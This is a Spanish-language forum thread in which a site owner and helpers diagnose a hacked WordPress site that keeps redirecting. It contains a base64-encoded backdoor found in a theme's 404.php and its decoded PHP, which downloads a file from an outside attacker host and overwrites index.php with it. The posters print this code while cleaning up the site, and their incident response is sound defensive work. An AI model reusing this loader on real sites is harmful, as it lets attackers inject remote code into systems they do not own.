Mi Wordpress Hackeado

Iniciado por ka0s, 24 Julio 2014, 18:59 PM

0 Miembros y 1 Visitante están viendo este tema.

ka0s

#10
Cita de: #!drvy en 24 Julio 2014, 20:47 PM
El "malware" al parecer solo afecta a las redirecciones 404. Archivos normales funcionan bien.
http://www.wilboradalibros.com.ar/readme.html

Me he fijado que existe un index.php pero esta vacio. Podrías mirar a ver si tiene algo sospechoso ? Aparte, intenta buscar algún archivo que tenga error404 o 404 o algo así en el nombre.. si existe, muestra a ver cual es su contenido.

PD: Las urls ponlas entre etiquetas geshi para evitar que otros usuarios las visiten sin querer.



Edit:

http://www.wilboradalibros.com.ar/wp-login.php

Lanza errores PHP que dicen que no puede modificar los headers. Apunta a la linea 154 en /wp-includes/functions.wp-scripts.php

Saludos

#!drvy MUCHAS GRACIAS por tu tiempo. Miré el archivo .php y está completamente vacío.
Lo que no entendí es tus últimas 2 líneas que debo hacer con la línea 154. Podrías aclararmelo?

Nuevamente muchas gracias!!

EDIT:

La línea 154, tiene esto:

Código (php) [Seleccionar]
* Do not allow accidental or negligent de-registering of critical scripts in the admin.
* Show minimal remorse if the correct hook is used.
*/
$current_filter = current_filter();
if ( ( is_admin() && 'admin_enqueue_scripts' !== $current_filter ) ||
( 'wp-login.php' === $GLOBALS['pagenow'] && 'login_enqueue_scripts' !== $current_filter )
) {
$no = array(
'jquery', 'jquery-core', 'jquery-migrate', 'jquery-ui-core', 'jquery-ui-accordion',
'jquery-ui-autocomplete', 'jquery-ui-button', 'jquery-ui-datepicker', 'jquery-ui-dialog',
'jquery-ui-draggable', 'jquery-ui-droppable', 'jquery-ui-menu', 'jquery-ui-mouse',
'jquery-ui-position', 'jquery-ui-progressbar', 'jquery-ui-resizable', 'jquery-ui-selectable',
'jquery-ui-slider', 'jquery-ui-sortable', 'jquery-ui-spinner', 'jquery-ui-tabs',
'jquery-ui-tooltip', 'jquery-ui-widget', 'underscore', 'backbone',
);

if ( in_array( $handle, $no ) ) {
$message = sprintf( __( 'Do not deregister the %1$s script in the administration area. To target the frontend theme, use the %2$s hook.' ),
"<code>$handle</code>", '<code>wp_enqueue_scripts</code>' );
_doing_it_wrong( __FUNCTION__, $message, '3.6' );
return;
}
}

$wp_scripts->remove( $handle );
}

/**

MinusFour

Mas bien afecta a las direcciones no fisicas:

Ninguna de las paginas de google me funcionan:

https://www.google.com/#q=site:wilboradalibros.com.ar

Pero archivos y carpetas de verdad si:


http://wilboradaslibros.com.ar/wp-admin/


Por cierto estos errores le salian a la dueña antes?

Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 414

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 883

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 884

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 885

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 886

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 887

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 888

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 891

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 892

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 893

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 894

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 897

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 898

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 899

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 900


Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location.

ka0s

Cita de: MinusFour en 24 Julio 2014, 21:03 PM
Mas bien afecta a las direcciones no fisicas:

Ninguna de las paginas de google me funcionan:

https://www.google.com/#q=site:wilboradalibros.com.ar

Pero archivos y carpetas de verdad si:


http://wilboradaslibros.com.ar/wp-admin/


Por cierto estos errores le salian a la dueña antes?

Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 414

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 883

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 884

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 885

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 886

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 887

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 888

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 891

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 892

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 893

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 894

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 897

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 898

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 899

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 900


Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location.

No eso no le salía. Siempre me dijo que se le redireccionaba su web sin ver errores.
Que complicado se está volviendo esto :(.
PD: Arriba edite el post y puse el código de la línea 154 que comentaba #!drvy

MinusFour

#13
¿Puedes poner lo que dice en:

wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos.

Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress.

ka0s

Cita de: MinusFour en 24 Julio 2014, 21:19 PM
¿Puedes poner lo que dice en:

wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos.

Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress.

De la 875 a 902 dice es esto: (Te lo paso completo para que no quede en partes)

Código (php) [Seleccionar]
function wp_clear_auth_cookie() {
/**
* Fires just before the authentication cookies are cleared.
*
* @since 2.7.0
*/
do_action( 'clear_auth_cookie' );

setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, ADMIN_COOKIE_PATH,   COOKIE_DOMAIN );
setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, ADMIN_COOKIE_PATH,   COOKIE_DOMAIN );
setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, PLUGINS_COOKIE_PATH, COOKIE_DOMAIN );
setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, PLUGINS_COOKIE_PATH, COOKIE_DOMAIN );
setcookie( LOGGED_IN_COOKIE,   ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,          COOKIE_DOMAIN );
setcookie( LOGGED_IN_COOKIE,   ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH,      COOKIE_DOMAIN );

// Old cookies
setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );

// Even older cookies
setcookie( USER_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
setcookie( PASS_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
setcookie( USER_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
setcookie( PASS_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
}
endif;


A partir del primer setcookie sería 883 la línea.

ka0s

He puesto a funcionar desde el Wordpress mismo un Anti-Malware y me ha encontrado el siguiente backdoor en el archivo 404.php de  wp-content/themes



Cuando me dirigi a la ruta para verlo, lo que tenía ese archivo era esto:

Código (php) [Seleccionar]
ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUm1ORmFGVmliSEJvVldwR1lXSldjRVpoUnpsT1VsZDRSbFJWWkd0VE1ERjBXak5rWVZKWGFFTlViWFEwVGxVNVdWUnNjRmRsYTFvelYxUkpkMDVYVWxkaVJsSlBWakpvY0ZWcVJtRk9WbEpJVFVSV2JGWnVRVEZVTVdoRFlWZEtWMU51VG1GV1ZUQjRWRlZrVjFOV1ZsaE9Wa0pyVFdwc2VWZFVRbXRTTURGSVVtdFNVbFpIZUV0VmFrcFRZekZ3UmxwR1pHdFdNVXAzVjJwS2MxVXhTbFZpUlZaWFlrWldORlZ0ZUZOak1WWjBWMnhhYUdWdGVGSldiWFJQVTIxT1JtVklRbHBOYWxaUldrUkpOVlJHYkZkYVJuQnBUV3RhV2xaSE1XRlpWa2w1WlVSV1ZFMUZOVlJhUkVaelYxWldkRTlWTVdoV01EUjVWMnRTVDFGdFVrZGhNMnhRVjBaYWNsVnFSbUZOVm5CR1ZHMXdhbEpYZUVkVmJYTTFWVEZGZDFOdVpGcGxhMVV4V1ZSS1IxZFdUbGhQVlhSVVVsVndkbGRyVm10aWJWSldZMFJXVUZaRk5YRlZXSEJIWWpGa2Nsa3phR3BTTUhCM1YxUk9RMU5zU2xaWGJFSldZVEExUTFkcVNrZFhWbEowVjIxR1UwMXVaekZWZWtKUFZUSlJlR0pHYkZaaVZHeE9XVlprVDAxc2NFVlVhMHByVWpCYVdWUnNaSGRo.Vms1SFYyNUtXR0pIYUU5WmJYUXdWa2RLUlZwRlVtaFdhM0I0VjFkd1MxVXlTa2RSYkZKU1lsUkdiMVpxVG05ak1XUkZVMjEwYVZJeFNraFVNV1IzWVZVeGNWWllaRmhpUjAxNFZGVmtUMDVXYjNsa1JuQk9ZVzE0ZVZZeWVGcE9WVEZJVm10c1ZsZEZTbEZhUkVrMVkyeHNWMWw2Um1oTldFSmFXVlZrWVdGc1NYZFhXR1JhVmxVMVExUXhWbk5TUmxaMVdrWndXRkpyY0RKV1JXUnpZVzFTZEZKc2FFOVdNMUpvVmpCa2EwMVdhM2RhUnpsci5UVWhCTWxsNlFqQlRiRVYzVW0wMVZGWlZOVU5YYWtKelVrWkdXRnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSV2hwVW5wR1RWVnFSbmRrTVd4eVdrWmtZV0pWTlVwV2JYQkRWMVV4Y2s1VVNscGlWRlpVV1d0a1MyUldWblZqUlhoU1RWVndNMWRYTUhoVk1rcElWbXRrVUZkSFVtRldNRnBMWkd4U1JsUnJTbWhOVjNRMVZERmtNRmxXVlhsa1NHUmhWMGRTTWxkcVFuTlNSa1pZV2tWd1VrMUZXblZWTVZaUFVXeHZkMkpGVWxKV01sSkxWVlJDUjJKc1pITmFSVGxwVFd0dk1WVldZekZWVmtsNFkwUktXbUpVVmxOWGFrWnlaVlU1V1ZSdGJFNU5SM014VlRGak1WTXlTa2RqUlZKVVZYcFdjUzVaVldoS1lqQTFSVlJZUWsxaGVsWkdWVlpTVjFOc1NsZFhhbFphVFdwQk1WcFdXa05TUlRsWVRWZHNUbUZzVmpOV1ZXUnpZV3MwZVZkc2FGZGlhelZ4VkZkNFdrMHhSWGxpUlVwaFR.VZDRSVlZXWkd0VGJFVjNVbTAxVkZaVk5VTlhha0p6VWtaR1dGcEZjRkpOUlhCNlZqRlNTMkl5VW5KaVJWSmFaVzFvYUZsc1VuTk5WbkJHVkd0T2FHSlZiRFZhVldoaFlXMUdjVkZ1UWxwTmFrWllXVlJDYzJOVk5WWlhiWEJwWVROQmVWZFVTbmROTWxKelkwaFNVRmRHV25KVmExSlRaRlpSZWxwSVdtRk5SM2hGVlZaa2ExTnNSWGRTYlRWVVZsVTFRMWRxUW5OU1JrWllXa1Z3VWsxRlduVlhiWGhIWkd4dmVWZHNhRmRpYXpWeFZGZDRXazB4UlhsTlZtUm9ZbFZhU1ZRd1pHdFRNREZ6VjJwV1drMXFRVEZhVmxaM1RtMU5kMlJITVZaV2VteE5VekZPY2s1NWEzQlBkeWtwT3cpKTs

BORRÉ EL ARCHIVO, pero intenté acceder a la web y sigue redireccionandosé!! :(

MinusFour

Eso es base 64 y se traduce a:

Código (php) [Seleccionar]
$code_txt = 'http://lamirona.aler.org/index.txt';
$path = getenv("DOCUMENT_ROOT").'';

if(is_dir($path.'/wp-content') AND is_dir($path.'/wp-admin') AND  is_dir($path.'/wp-includes')){
$code= file_get_contents($code_txt);
$index_path = $path.'/index.php';
                if(file_put_contents($index_path, $code)){
                echo '<font color="red"7409 Error</font>';}else{
                echo '<font color="red">Error</font>';
                }
}else{
echo 'error';
}


Seguro que no había nada raro en el index.php?

#!drvy

En realidad ese script ha hecho su trabajo xD

http://lamirona.aler.org/index.txt
Esta vació y por eso el index.php esta vació :P

ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ?

Saludos

EFEX

Yo miraria en wp-includes que archivos fueron los ultimos en ser modificados.
GITHUB 

ka0s

Cita de: #!drvy en 24 Julio 2014, 21:52 PM
En realidad ese script ha hecho su trabajo xD

http://lamirona.aler.org/index.txt
Esta vació y por eso el index.php esta vació :P

ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ?

Saludos

Este es el reporte precisamente:



Gracias por responder tan rápido y dedicarle su tiempo a mi ayuda. Creo que estamos cerca... :)